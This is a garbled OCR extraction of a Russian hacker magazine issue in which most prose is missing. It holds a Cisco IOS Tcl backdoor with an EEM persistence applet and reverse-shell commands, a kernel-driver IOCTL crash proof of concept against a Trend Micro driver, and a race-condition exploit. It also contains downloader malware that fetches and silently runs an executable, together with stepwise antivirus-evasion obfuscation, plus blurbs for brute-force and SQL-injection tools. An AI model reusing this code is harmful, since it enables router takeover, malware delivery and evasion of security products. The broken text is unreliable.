[ptsec@maxpatrol~}$ telnet router 2002

Trying 192. 168. 1. 10...
Connected to router.
Escape characters is ' ^].
Cisco router admin console:
Router #
TFTP-
192. 168. 1. 4
CISCO
192. 168. 1. 10
TCL

Cisco Systems
(level 15),
TCL.
, ,

.
TCL (TOOL COMMAND LANGUAGE)
TK, 80- -
; expect IRC-
eggdrop,
apache mod_tcl. IOS, Cisco Tcl, IOS
12.3(2)T (cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/
gt_tcl.html),
Cisco Systems . ,
IOS IVR IP-.
Tcl,
,
:
064

;
;
, ()
;
() .
, TFTP- ,

.
.
X 11 /142/ 10
Shell
Trying 192. 168. 1. 10...
tclsh tftp://192. 168. 1. 4/icmp.tcl

Router #
./tftpboot/
.icmp.tcp
TFTP-
()
192. 168. 1. 4
, ,

Telnet.
CTF 2010.
, Tcl
IOS.
TCL- 15 (enable). Tcl
,
, TFTP, FTP, RCP, SCP.
RAM-,
FLASH- c
IOS.
FLASH :
Router# copy tftp://192.168.1.4/script.tcl flash://
script.tcl
Router# tclsh flash://script.tcl
TFTP-:
Router# tclsh tftp://192.168.1.4/script.tcl
TCL-,
TCP/2002 (EXEC).
, (
TFTP).
proc callback {sock addr port} {
fconfigure $sock -translation crlf -buffering line
puts $sock "Cisco router admin console:"
puts $sock " "
puts -nonewline $sock "Router# "
flush $sock
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
flush $sock
if {[catch {gets $sock line}] ||
[eof $sock]} {
return [close $sock]
}
X 11 /142/ 10
192. 168. 1. 10
catch {exec $line} result

if {[catch {puts $sock $result}]} {
return [close $sock]
}
puts -nonewline $sock "Router# "
flush $sock
}
set port 2002
set sh [socket -server callback $port]
vwait var
close $sh

( EXEC)

- (level 15).
[ptsec@maxpatrol ~]$ telnet router 2002
Trying 192.168.1.10...
Escape character is '^]'.
Router#
, Tcl
IOS. IOS,
Tcl, EXEC. ,
clear
line. -
:
1. , (console 0 vty 0 4), ,
exec-timeout 0 0, .
Router>en
Router#conf t
Enter configuration commands, one per line.
CNTL/Z.
Router(config)#line vty 0 4
Router(config-line)#exec-timeout 0 0
End with
2. EEM
(Embedded Event Manager) ,
, . -
065
tclsh tftp://192.168.1.4/ioscat.tcl -ie -oa 192.168.1.4 -op12345
2 !

[plsec@maxpatrol ~]$ nc -l -p 12345
Router#
./tftpboot/
.ioscat.tcp
TFTP-
()
192. 168. 1. 4
192. 168. 1. 10
CISCO
Shell
Trying 192. 168. 1. 10...
tclsh tftp://192.168.1.4/
ioscat,tcl -ip2002 -oe
Router #
./tftpboot/
.ioscat.tcp
TFTP-
()
192. 168. 1. 4
,
TFTP 20 .
Router(config)# event manager applet BACKDOOR
Router(config-applet)# event timer countdown name
Delay time 20
Router(config-applet)# action 1.0 cli command "enable"
Router(config-applet)# action 1.1 cli command "tclsh
tftp://192.168.1.4/script.tcl"
Router(config-applet)# action 1.2 syslog msg "Backdoor
is executed"
3. TCL- EEM (Embedded

Event Manager) ,
, .
, IOScat
IOSmap, IOScat,
, .
TCL,
Netcat, TCL flash- TFTP-
RAM. TCL . .
(2002 ):
192. 168. 1. 10
(
netcat: nc -l -p 12345)

(2002):
Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002
-oa192.168.2.1 -op80
, , -
,
.
IOSmap ,
nmap, , ,
IOS.
TCL- IP- TCP/UDP-,
ICMP. :
Router>en
Router#tclsh tftp://192.168.1.4/iosmap.tcl
192.168.1.1-5 -p20-24,80,443
Loading iosmap.tcl from 192.168.1.4 (via
FastEthernet0/0): !
[OK - 15912 bytes]
Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002 oe
( 12345):
Router# tclsh tftp://192.168.1.4/ioscat.tcl -ie
-oa192.168.1.4 -op12345
066
Loading services.list from 192.168.1.4 (via

FastEthernet0/0): !
[OK - 42121 bytes]
Starting IOSmap 0.9 ( http://www.defaultroute.ca ) at
X 11 /142/ 10

[plsec@maxpatrol ~]$ lynx http://192.168.4:2002
tclsh tftp://192.168.1.4/ioscat.tcl ip2002 -oa192.168.2.1 -op80

-
192.168.2.1
./tftpboot/
.ioscat.tcp
TFTP-
()
192. 168. 1. 4
192. 168. 1. 10
, . , ,
:
MaxPatrol
2002-03-01 02:59 UTC

Free Memory on Platform = 29038388
for this scan = 2622514
/ Memory required
Host 192.168.1.1 is unavailable

Router# show processes cpu | i Tcl

212
2284
17762
128
0.67% 162 Tcl Serv - tty16
Router# show tcp brief all
TCB
Local Address
659CDABC 192.168.1.10.23
654485B4 *.2002
65CA2D04 *.80
3.68%
Foreign Address
192.168.1.4.5163
*.*
*.*
2.88%
(state)
ESTAB
LISTEN
LISTEN

Interesting ports on host 192.168.1.4
PORT
STATE
SERVICE
20/tcp
closed
ftp-data
21/tcp
closed
ftp
22/tcp
closed
ssh
23/tcp
closed
telnet
24/tcp
closed
priv-mail
80/tcp
open
http
443/tcp
closed
https
Router#

:
-sP ;
-sT TCP- TCP connect;
-sU UDP- IP SLA.
L,

Cisco Systems.
X 11 /142/ 10
IOS 12.4(4) CPP (Control Plane Policy):

Router# show control-plane host open-ports
Active internet connections (servers and established)
Prot|Local Address|Foreign Address|Service|State
tcp|*:23|*:0|Telnet|LISTEN
tcp|*:23|192.168.1.4:1379|Telnet|ESTABLIS
tcp|*:80|*:0|HTTP CORE|LISTEN
tcp|*:1234|*:0|Tcl Serv - tty163|LISTEN
,

MaxPatrol ( ptsecurity.ru).
, , , Cisco
TCL-.
.
,
IOS .
, Cisco :). z
067

CISS Research Team?

,
Windows
Ring 0.
, ,
, HIPS (Host Intrusion Prevention System)
internet security.
,
,
, .
, , ,
,
,
.
?
068
ioctl

, .
-.
,
,

. ,
- (I/O manager). ,

X 11 /142/ 10
BSOD
trend micro
. ,
- .
, IoCreateDevice.
-.
- (, , ,
..),
(, ). , ,
DRIVER_OBJECT, IRP (I/O Request
Packet) .
DRIVER_OBJECT::MajorFunction, , ,
, IRP_MJ_
MAXIMUM_FUNCTION + 1.
IRP_MJ_MAXIMUM_FUNCTION Driver Development Kit (DDK) 27. ,
, , . IRP :
typedef
NTSTATUS
(*PDRIVER_DISPATCH) (
IN struct _DEVICE_OBJECT *DeviceObject,
IN struct _IRP *Irp
);
DeviceObject (
), Irp , ,
, , .
, , ,
. , CreateFile/OpenFile ( native- NtCreateFile/
NtOpenFile). , ,
,
, , - .
, ,
, IRP_MJ_CREATE.

.
,
,
X 11 /142/ 10
CreateFile. ,
ReadFile, WriteFile DeviceIoControlFile
.
.
,
:
BOOL
WINAPI
DeviceIoControl(
HANDLE hDevice,
DWORD dwIoControlCode,
LPVOID lpInBuffer,
DWORD nInBufferSize,
LPVOID lpOutBuffer,
DWORD nOutBufferSize,
LPDWORD lpBytesReturned,
LPOVERLAPPED lpOverlapped
);
hDevice ,
lpInBuffer nInBufferSize , lpOutBuffer nOutBufferSize
,
.
dwIoControlCode.
, .
-
(
) . -
:
DEVICE TYPE ( 16-31); 0-7FFFh Microsoft,
8000h-0FFFFh ,
. IoCreateDevice
DeviceType .
ACCESS , .
FILE_ANY_ACCESS .
FILE_READ_ACCESS .
FILE_WRITE_ACCESS .
FUNCTION , .
METHOD -.
METHOD_BUFFERED -.
,
,
nInBufferSize nOutBufferSize DeviceIoControl.
069
BSOD

( lpInBuffer). IRP_MJ_DEVICE_CONTROL AssociatedIrp.SystemBuffer
IRP, Parameters.DeviceIoControl.
InputBufferLength IO_STACK_LOCATION. ,
, - . IRP , IoStatus.Information
IRP.
METHOD_IN_DIRECT METHOD_OUT_DIRECT
-.

MDL MdlAddress
IRP. , ,
, .
METHOD_NEITHER ,
. DeviceIoControl.Type3InputBuffer
IO_STACK_LOCATION
, UserBuffer IRP
.
user-mode DDK ProbeForRead/ProbeForWrite.

- METHOD_NEITHER,

IRP- ( DeviceIoControl.Type3InputBuffer
UserBuffer).

ProbeForWrite,
, ,
, , BSD . ,
, ,
. .
,
PASSIVE- APC IRQ Level. DPC
,

.
,
,
070
, ,
..
.
tmtdi:
kd> !devobj tmtdi
Device object (812cc9f0) is for:
tmtdi*** ERROR: Module load completed but symbols
could not be loaded for tmtdi.sys
\Driver\tmtdi DriverObject 816693b8
Current Irp 00000000 RefCount 1 Type 00000022 Flags
00000040
Dacl e12cbbb4 DevExt 812ccaa8 DevObjExt 812ccab0
ExtensionFlags (0000000000)
Device queue is not busy.
kd> !drvobj 816693b8 2
Driver object (816693b8) is for:
\Driver\tmtdi
DriverEntry: f0f0c505 tmtdi
DriverStartIo: 00000000
DriverUnload: 00000000
AddDevice: 00000000
Dispatch routines:
...
[0e] IRP_MJ_DEVICE_CONTROL f0f07b38 tmtdi+0xdb38
<------ IoCtl
, tmtdi tmtdi.sys. , ,
(Kernel Pool Memory Corruption,
DVD):
BSoD:
hDevice = CreateFileA(
"\\\\.\\tmtdi",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
inbuff = (char *)malloc(0x4000);
if(!inbuff)
{
X 11 /142/ 10
User
Driver
User
Mode
Subsystem
I/O subsystem
I/O manager
Kernel space
User space
NTDLL.DLL
Kernel
mode
Executive API
I/O manager
NtDeviceIoControlFile
Kermel32.ddl
DeviceIoControl
GUI

File system driver
Device drivers
Hardware abstraction layer
Hardware interfaces
printf("malloc failed!\n");
return 0;
}
(read/write port, timers, clocks, DMA, cache control)
I/O Manager
memset(inbuff, 'A',0x4000-1);
ioctl = 0x220044;
DeviceIoControl(hDevice, ioctl,
(LPVOID)inbuff, 0x10,
(LPVOID)inbuff, 0x10, &cb,NULL);
Syscall

.

(
NtLoadDriver). ,

.
,
(Zw*
Nt* ntdll.dll), (Zw*
ntoskrnl.exe).

, - . , ,
,
GetPreviousMode.
PreviousMode KTHREAD, , .

Race Condition
(RC) ( TOCTTOU). Matousec,
RC, PoC/
Exploit.
,

SSDT-, RC.
1.
;
(RkUnhooker, GMER ) SSDT:
X 11 /142/ 10
ntkrnlpa.exe-->NtCreateKey, Type: Address

change 0x8061A286-->F8D380E6 [Unknown
module filename]
ntkrnlpa.exe-->NtCreateThread, Type:
Address change 0x805C7208-->F8D380DC
[Unknown module filename]
ntkrnlpa.exe-->NtDeleteKey, Type: Address
change 0x8061A716-->F8D380EB [Unknown
module filename]
ntkrnlpa.exe-->NtDeleteValueKey, Type:
Address change 0x8061A8E6-->F8D380F5
ntkrnlpa.exe-->NtLoadDriver, Type: Address
change 0x80579588-->F8D38113 [Unknown
module filename]
ntkrnlpa.exe-->NtLoadKey, Type: Address
change 0x8061C482-->F8D380FA [Unknown
module filename]
ntkrnlpa.exe-->NtOpenProcess, Type: Address
change 0x805C1296-->F8D380C8 [Unknown
module filename]
ntkrnlpa.exe-->NtOpenThread, Type: Address
change 0x805C1522-->F8D380CD [Unknown
module filename]
ntkrnlpa.exe-->NtReplaceKey, Type: Address
change 0x8061C332-->F8D38104 [Unknown
module filename]
ntkrnlpa.exe-->NtRestoreKey, Type: Address
change 0x8061BC3E-->F8D380FF [Unknown
module filename]
ntkrnlpa.exe-->NtSetSystemInformation,
Type: Address change 0x80605E76-->F8D38118
ntkrnlpa.exe-->NtSetValueKey, Type: Address
change 0x8061880C-->F8D380F0 [Unknown
module filename]
ntkrnlpa.exe-->NtTerminateProcess, Type:
Address change 0x805C8C2A-->F8D380D7
ntkrnlpa.exe-->NtWriteVirtualMemory, Type:
Address change 0x805A981C-->F8D380D2
HTTP://WWW
links

,
ruscrypto.org/netcat_files/File/ruscrypto.2009.027.zip

Windows,

rsdn.ru/article/asm/
driverholes.xml.
ibm.com/developerworks/linux/library/ldevctrl-migration/
wasm.ru/series.
php?sid=9
seclists.org/bugtraq/2003/Dec/351
matousec.com/
info/articles/khobe8.0-earthquake-forwindows-desktopsecurity-software.php
071
IoCtl
2. ,
, , NtCreateKey (POBJECT_
ATTRIBUTES, PUNICODE_STRING).
3. seclists.org/bugtraq/2003/
Dec/351.
4. :
ZwCreateKey = (_ZwCreateKey *) GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "ZwCreateKey");
...
OBJECT_ATTRIBUTES oa;
wchar_t wcKeyName[] = L"\\REGISTRY\\User\\S-1-5-21-861
567501-287218729-1801674531-1003\\Software\\NetScape";
UNICODE_STRING KeyName = {
sizeof wcKeyName - sizeof wcKeyName[0],
sizeof wcKeyName,
wcKeyName
};
...
while ( !_kbhit() )
{
HANDLE hKey;
oa.ObjectName->Buffer = (PWSTR)ptr;
NTSTATUS rc = ZwCreateKey(&hKey, KEY_READ, &oa,
TitleIndex, NULL,
REG_OPTION_NON_VOLATILE, &Disposition);
if ( NT_SUCCESS(rc) )
CloseHandle(hKey);
}
...
DWORD WINAPI Crack(LPVOID Context)
{
POBJECT_ATTRIBUTES oa = (
POBJECT_ATTRIBUTES) Context;
DWORD *ptr = (DWORD*)&oa->ObjectName->Buffer;
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_HIGHEST);
SetEvent(hStartEvent);
while ( true )
{
*ptr = 0x90909090; //

if ( WaitForSingleObject(hStopEvent, 1)
== WAIT_OBJECT_0 ) break;
}
return 0;
}
072
5. . ,
( 8 60),
. BSOD.

.
kd> !analyze -v
Bugcheck Analysis
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be
protected by try-except, it must be protected by a
Probe. Typically the address is just plain bad or it
is pointing at freed memory.
DVD.
,
/ , . ,

:
1. , , ASCII- Unicode-, ,
strlen/wcslen
Page Fault .
2. kernel mode-, .
, . ,
, , .
3. , ,
, .

ZwDuplicateHandle,

,
.
, , HIPS
. . , . , . z
X 11 /142/ 10

icq 884888, http://snipper.ru
X-TOOLS
: WBF.Gold
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: [x26]VOLAND
-
- WBF.Gold

X-Tools [Web] BruteForcer
.

:
POST;
GET;
Basic- (
HEAD);
HTTPS (
HTTPS-);
(GET/POST);
Cookies;

(
);
( ,
, );
:
XML- ()
;
input , .
:

;

;

;
;
;
074

(
);
.
, WBF.Gold
-,

.

, wonted.ru/programms/
wbf-gold
: VPSProxy
: [x26]VOLAND
- [x26]
VOLAND.

HTTP/HTTPS- PHP GUI-.

,
,

GUI.
. ,
:
HTTPS PHP-;
HTTPS-;

;

SOCKS5-;
- ;
cookies,
(
,
mycookie=value; mycookie2=123;);
;
;

HTTP 1.0;

;
,
, (/

);
;

;

;
;
: tray (
), start ( ),
hidden ( ).
1. gate.php
( 123);
2. URL
/cookies (
),
Use;
3. (
);
4. Start
localhost:2222 (HTTP) localhost:2223
(HTTPS);
5.
:).
:
[dir]\
VPSProxy.exe -tray -start.

forum.antichat.ru/thread227973.
html.
X 11 /142/ 10
Reverse IP

: 0xRILPSIC
: 0x00
,
webxakep.net
0xRILPSIC (Reverse IP + Link Parse +
SQL Injection Check).
,
:
1. Reverse IP ;
2.
;
3.
SQL-.
:
1. -
, ;
2. 0xRILPSIC Reverse IP (
, IP);
3.
- ;
4.
SQL-;
5. :).
,
IP
.

:
Reverse IP, ;

;
;
HTTP-;

;

;

;

;

links.txt;
(

);
;

;
X 11 /142/ 10
-

SQL-
check.txt;
-;
;
.
.

:

- ;

(

);

;
SQL Injection
,
, SQL- (
);

;

.

http://icq-email-vkontakte.ru/
forum/showthread.php?p=59345.
: rsaUnDumper[sql]
: rsaReliableS

SQL- . ,
,
SQL-, .

SQL-
!
:
( 1 100 );
HTTP-;
( DDoS );

( MySQL
);
UserAgent Referer;
/ dump (
, );

,
;
,
;
SQL
limit';
, ;
,
;

;
;
-
;
;
.Net Framework 2.0+.

SQL-.
http:// limit,

<{param}>, ...
,
.
http://icq-emailvkontakte.ru/forum/showthread.php?t=8310.
: Small Parser
: DjFly
,

Small Parser
, DjFly.
uin;pass,
login@mail.ru .. ( ,

).

import.
txt, , Start.

import.txt
export.txt.z
075
MALWARE
deeonis deeonis@gmail.com
KIS2011, NOD32, Avira, McAfee: !

,

. ,
.
. ,
.
,
.
Kaspersky Internet Security 2011,
. ESET NOD32
,
.
ThreatSense, ,

. Avira AntiVir. . , ,
McAfee ,

. , .
, ? .
, -. :
076

LONG res;
TCHAR szUrl[] = _T("http://virhost.com/bin/launch.exe");
TCHAR szTempName[] = _T("C:\\launch.exe");
//
res = URLDownloadToFile(NULL,szUrl,
szTempName,NULL,NULL);
if (res == S_OK) {
ShellExecute(NULL,_T("open"), szTempName, NULL,
NULL, SW_HIDE);
}
- exe- ,
.

.
.
downloader. , ,
X 11 /142/ 10
- .
, ?!
Heur.Downloader, NOD32 probably unknown
NewHeur_PE.

, (
),
.
. .
.
.
.
URLDownloadToFile , ,
ShellExecute ,
. ,
,
URLDownloadFile.
:

LONG res;
//
TCHAR szUrl[] = _T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
TCHAR szTempName[] = _T("F?Yidlkfm+`}`");
//
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
//
res = URLDownloadToFile(NULL,szUrl,szTempName,
NULL,NULL);
X 11 /142/ 10
if (res == S_OK)
{
ShellExecute(NULL,_T("open"), szTempName,
NULL, NULL, SW_HIDE);
}
, szUrl szTempName
.
. , ,
decrypt , . ,
,
, , .
, . , ,
, Heur.Downloader. NOD32
, ,
probably unknown NewHeur_PE.
Avira McAfee, TR/
Downloader.Gen Suspect-D!2B731345A4DA .
, .
. ,
.
. , .
,
- (,
),

.
, , . 2000001 (, ?). ,
, ,
, .
077
MALWARE

.
,

, .

. :

//
,
Malware
, ,
. ,
,
: , .
,
, ,
, - .
,
, . , McAfee,
,

. , deeonisa
,
,
, .
, .

,
, .
078
// ...
for (size_t i = 0; i <= 2000000; i++)
{
//
int key = (i%5)-(i%5) + 5;
decrypt(szUrl,key);
}
//
// ...
,
(, ),
, ,

McAfee?
McAfee , , ,

exe-. ,
API-, , McAfee .
,
, .
, .
, , .
API , McAfee .
,
CreateFile ntldr,

.
X 11 /142/ 10
//
// ...
key
CommandLineToArgvW. , , , ,
,
, .
, McAfee, . ,
Antivir . McAfee
. , .

. , .
: CreateFile
ntldr, .
, , INVALID_HANDLE_VALUE.
, :
Avira
/. KIS2011 ,
.
. NOD32 , Kaspersky
, . , .
! AntiVir
TR/Downloader.Gen. McAfee

Suspect-D!601711206FB9. ,
:
. McAfee ,
.
.
, ,
.
.

,
.
API.

Windows, , , ,
API. , API. ,
CommandLineToArgvW ,
.
,

.
CreateFile
//
//
HANDLE h = CreateFileA("c:\\ntldr",
FILE_READ_ACCESS, 0, 0, OPEN_EXISTING, 0, NULL);
// if
if (h != INVALID_HANDLE_VALUE)
{
int key = 5;
decrypt(szUrl,key);
}
//
// ...
, ,
, INVALID_HANDLE_VALUE, , ,
.
Scan . KIS . NOD32
Avira AntiVir. McAfee ,
Suspect-D!73AD7FD9A4E5. McAfee
.
API- Windows:
CreateFile GetLastError. ,
CreateFile ,
, , - ghj12lkfd0fivndsi83s.cj8.
GetLastError
ERROR_FILE_NOT_FOUND.
.
CommandLineToArgvW
//
// ...
GetLastError
//
//
//
int key;
// GetLastError
HANDLE h = CreateFile(
_T("c:\\jdksjf9i34ufhvnmfieru834gfbher.xls"),
DWORD key = GetLastError();
key +=3;
decrypt(szUrl,key);
CommandLineToArgvW(lpCmdLine, &key);
decrypt(szUrl,key);
X 11 /142/ 10
079
MALWARE
URLDownloadToFile
ShellExecute. :
//
void thr1()
{
Sleep(0);
int key = 5;
decrypt(szUrl,key);
}
Avira AntiVir Personal

//
// ...
, ,
GetLastError CreateFile,
API,
.
. ,
, , . Kaspersky
, . , , Heur.
Downloader. NOD32.
. ,
McAfee .
.
. .
. -
int APIENTRY _tWinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
DWORD p;
HANDLE t1=CreateThread(0,0,
LPTHREAD_START_ROUTINE)&thr1,0,0,&p);
Sleep(3000);
//
// ...
}
, Sleep.
, . 100%

.
. , , McAfee, KIS2011 . 32
Avira . ,
, AntiVir.
.
7

, McAfee , -
. .
-, ,
McAfee 8. - .
. ,
.
.
1
2
3
4
5
6
7
8
080
KIS2011
NOD32
Avira AntiVir
McAfee
+
+
+
+
4 8
+
1 8
+
+
2 8
+
+
+
+
+
+
+
7 8
.
,

(event).
, ,
e_Heur.
.
:

//
void thr1()
{
HANDLE event = OpenEvent(SYNCHRONIZE ,FALSE,
_T("e_Heur"));
WaitForSingleObject(event,INFINITE);
int key = 5;
decrypt(szUrl,key);
X 11 /142/ 10
}
LPTSTR lpCmdLine,
int nCmdShow)
{
HANDLE event = CreateEvent(NULL, TRUE, FALSE,
_T("e_Heur"));
DWORD p;
HANDLE t1=CreateThread(0,0,
LPTHREAD_START_ROUTINE)&thr1,0,0,&p);
Sleep(2000);
SetEvent(event);
Sleep(2000);
//
// ...
}

. ,
6. McAfee , NOD32 , ,
.
McAfee
}
//
HMODULE hModule = LoadLibrary(_T("urlmon.dll"));
URLFUNC urlProc = (URLFUNC)GetProcAddress(hModule,
szUrlDownload);
,
API- .
, ( , McAfee) .
URLDownloadToFile ShellExecute, .
:
hModule = LoadLibrary(_T("shell32.dll"));
EXECFUNC execProc = (EXECFUNC)GetProcAddress(hModule,
szShellExec);
API
typedef HRESULT (__stdcall *URLFUNC)(LPUNKNOWN,LPCTSTR,
LPCTSTR,DWORD,LPBINDSTATUSCALLBACK);
typedef HINSTANCE (__stdcall *EXECFUNC)(HWND,LPCTSTR,
LPCTSTR,LPCTSTR,LPCTSTR,INT);
LPTSTR lpCmdLine,
int nCmdShow)
{
LONG res;
//
TCHAR szUrl[] =
_T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
//
TCHAR szUrlDownload[] =
_T("PWIAjrkijdaQjCli`R");//_T("URLDownloadToFileW");
TCHAR szShellExec[] =
_T("Vm`ii@}`fpq`R");//_T("ShellExecuteW");
HANDLE h = CreateFileA("e:\\ntldr",
if (h != INVALID_HANDLE_VALUE)
{
int key = 5;
decrypt(szUrl,key);
decrypt(szUrlDownload,key);
decrypt(szShellExec,key);
X 11 /142/ 10
//
res = (urlProc)(NULL,szUrl,szTempName,NULL,NULL);
if (res==S_OK)
{
(execProc)(NULL,_T("open"), szTempName,
NULL, NULL, SW_HIDE);
}
}
( ntldr
CreateFile),
API, ,
ShellExecuteW URLDownloadToFileW.
GetProcAddress
.
.

. NOD32 Avira AntiVir
, , , .
McAfee. , .
API
Made in USA.
.
, .
. ESET NOD32
. Avira AntiVir
2 8. . McAfee, . z
081
MALWARE
, Senior Malware Analyst Heuristic detection group, Kaspersky Lab.

Zeus
, ][ , Zeus.
2007 .
,
.

.

(
.
082
.) , Trojan-Spy.Win32.Zbot.
anyz.
,
: , ,
X 11 /142/ 10
. 2. ResHacker
Dialog Zbot
1. DataDirectory PE- Zbot Hiew
. 3. Zbot
. 4.
Zbot
.
, PE-, ..
, .
Zbot: , , ..
, .
, , , ,
. ,
IDA 5.1 Hexrays.

CALL, /
[EBP + xx].
3.

API-,
FakeAPI.
,

. , ,
, HiliteMenuItem,
, , ,
:).
, , VirtualAlloc,
,
. 4 ,
IDA. , ,
UPX, .
-,
Hiew, UPX
, .
, RVA
0x1000, UPX0,
Physical Size . ,
, ImageBase + 0x1000
VirtualSize UPX0, . , , , .
.
ResHacker, Dialog
. , . -,
, Zbot
.
Hiew, 1.
, . ,
- .
UPX, .
PE .
X 11 /142/ 10
,
VirtualAlloc . ,
PEB (Process Environment Block).
ReadOnlyStaticServerData, ,
Introduction to NT Internals : This field has a pointer
083
MALWARE
. 7. Spy++

,
API,

FakeAPI
to a pointer to a system-wide shared memory location (read-only).

It is usually empty. , ,

C:\WINDOWS.
.
.
NtQuerySystemInformation
0xAD SYSTEM_
PERFOMANCE_INFORMATION .
,
PE. PETools LordPE + ImpRec 1.6 (PETools , ).
, Zeus, ,
-, . ,
,
. ,
Zeus C ,
, , . , , .
VMWare
IDA.
, FileMon, RegMon, Process Explorer
PETools LordPE. , IDA
Hex-Rays, ASM- C. . , (. . 5).
, Zbot : -f,
-i, -n, -v. , -I Information,
MessageBox
( . 6). -n ( Zeus Application Data
084
). -v

GetMessageW. , , ,
.
,

. . ,
,

. , Zeus ,
; ( ):
@echo off
:d
del "c:\zbot.exe"
if exist "c:\zbot.exe" goto d
del /F "C:\DOCUME~1\antonie\LOCALS~1\Temp\
tmp8c7f7853.bat"
, ,
, , .
,
.
Zeus cabinet.dll,
FCICreate, FCIAddFile, FCIFlushCabinet . cab-,
.
nspr4.dll The Netscape Portable Runtime
(NSPR), allows compliant applications to use system
facilities such as threads, thread synchronization, I/O, interval timing,
atomic operations, and several other low-level services in a platformindependent manner.
NSPR: PR_OpenTCPSocket,
PR_Close, PR_Read, PR_Write . X 11 /142/ 10
. 8. Zeus ****case.cc

,

. 6. Zbot -i
. Zeus
****case.cc,
. ,
, . IP-.
clean-mx.de
(. 8).
, Zeus , (
, . ,
).
, ,
, Zeus, .
. 5. Hex-Rays ,

Zeus #32768,
ConsoleWindowClass, CiceroUIWndFrame, MDIClient, SysListView32.
,
,
CiceroUIWndFrame. Spy++
Microsoft Visual Studio.
X 11 /142/ 10
Zeus . ,
,
, , .
, ,

.
, ,
, .
, , ,
,
. , Zeus
, ,
-i. z
085

Mifrill (mifrill@real.xakep.ru); (toxa@real.xakep.ru)
CHAOS
CONSTRUCTIONS 2010
IT-
, ,
, .
(
) : - ,
, ,
. ,
, !
Chaos Constructions ,
.
,
Chaos Constructions 2009,
, ,
, .
, CC
1995

ENLiGHT, Chaos Constructions.
ENLiGHT

,
. , , ,
,
, - .

,
, ,

. ,
, ,
086
074
.
CC 90-,
2000-,
, ,
. 1999
Chaos Constructions
.
CC

2006 . , ,
,
, , , ,
.
CC ,
,

. Chaos Constructions
,

(
) .
,
CC10
? ENLiGHT,
, 15
, ,
.
, Chaos Constructions
15-, , 13-
. 15
ENLiGHT,
.
, ,
. ,
,
, : ,
,
, , . , ,
, ,
.
, ? ,
, , .
,
, ANSI- ASCII-,
. ,
, ,
. ,
X 10 /141/ 10

,

, ,

ZX Spectrum, .
.
, (
).

,
,
, 64k Intro 512b Intro, , . , .
,
, ( ,

!), ,
, .
,
Assembly
,
,
:).
2010
- Chaos Constructions,
28-29 ,

-
47.
X 10 /141/ 10
CC

,
, ,
,
.
CC , ,
. CC10
,
(
Combined 64k
Intro, Combined 4k Intro, Combined Demo,
ZX Spectrum 640k Demo, Combined Tiny MP3
Music, Oldschool Tiny Music ..),
ZX
Spectrum Graphics ZX Spectrum Coding.
CC
(
),

, .
,
.

,
.

: .
http://
party10.cc.org.ru. FTP HTTP CC10
.
,
, Chaos
Constructions 2010
(
40). ,
,
,
.
, , , ,
.

,
.
CC ,

,
. , ,
,
, -, :

Real-time Graphics
Real-time Music. , ,
,

( ?!). ,

. ,

,
. ,
087

Chaos Constructions
,
, -
, ,
.
, CC ,
, ..,

.

, , CC10 . ,

,
.
, , ,

. - Mortal Combat,
(Battle City) Dendy.

Starcraft 2,
Guitar Hero 5 ,

Quake 3 CTF. ,
(
, ,
7 34 !)
Ethernet ,
ART
. -
, ,

Hack-Quest
][ (,
,
-) Toxa. ,
,
:).
, (, ?),
088
,
.
,
, , HDD Real-time Photo.

CC, ,
, , , .
CC
(16 ), ,
,
,
,
:).

, , -,

.
Chaos Constructions 2010, ,
, :
SDRF open source
, Open Source Hardware,

.
http://party10.cc.org.
ru/seminar.php,
, -

.
, ,
, !

-, ,
,
CC .
, ,
,
, .
CC , ,

, , ,
.
BBS,
MSX-DOS, MS-DOS MacOS,
Atari
XE Game System Amiga 600?
jukni ( )
, .
, , !
,

,
Chaos Constructions . -, ,
, -
,

.
, , . ,
,
EasyJohn.
http://easyjohn.livejournal.com/164192.html.
, , , ,
, , EasyJohn,
X 10 /141/ 10
ArkanoiD
: http://takedo.spb.ru
:
,

,
. , , ,
.
, (3yM), (random),
(oldayn) ,

! , -
,
CC
,
http://party10.cc.org.ru/online.php.

.
CC 2010

-,
. , ,
,

, .
2006 ,
,
-
. : ,
.
, ,
,
, , , ,
- ....
, Defcon, Blackhat,
, ?
, 2006
.

- .
CMS ,
,
-.
X 10 /141/ 10
,
!
, 2007
HIT
.
( Chaos Constructions
HackAround)
, ,
.

:
, ,

.

. , ,
, ,

.
, 2008
-.

.

, , :).
:

-,

.
,
,
-.

:
! ,

. ,
:
,

. ,
- blackbox-
, , : ,
, ,
,
,
. ,
-
:

.
, 2008 - . :
,
.
,
.
:).
,

(,
, Positive
Technologies,
).

WAF
. 2009 - ,

Chaos Constructions.
-
,

:). ,

2010 ! , ,
,
, , -
. ,
-
, .

,
089

, ,

.
!
(
) Chaos Constructions,
: ,
.
,
, , .
. ,

, .
,
.
, -, ...
,
, .
, , , ,
.
? ,
,
-?
toxa@toxahost.ru, .
,
-,
.
CC
-
ESET - (
),
http://www.esetnod32.ru/.
company/podcast/.

, , . ,
BlackHat, Assebly,
Hackers on Planet Earth, DEFCON .. ,
.
,

- 2010.
IT-
.
Hack In The Box
: 13-14
: -,
: http://www.hackinthebox.org/
090
HITB
][, ,
,
Hack In The Box .
X 10 /141/ 10
,
CC
HITB ,
. 2010 ,
(HITB ).
, , -
.
(Kaspersy Lab), (ISC), (ISC)
IT-.
SecTor
: 26-27
: ,
: http://www.sector.ca
,
, , ,
. 2007
: 10.554 11.060
. ,
,
DreamHack ,
- .
HackFest
: 5-6
: ,
: http://www.hackfest.ca
, IT-,
- . SecTor ,
. ,
( SecTor ),
.
, .
.
SecTor, ,
, , ,
, HackFest .

.
, , ()
. HackFest ,
, , .
DeepSec
Chaos Communication Congress
, , IT-. DeepSec ,
, , .
McAfee, Intel,
.
, (Digital Security)
(TREND MICRO Inc).
, , ,
, ,
SAP.
, ,
1984 . , , - Chaos Computer
Club.
, -
, , ,
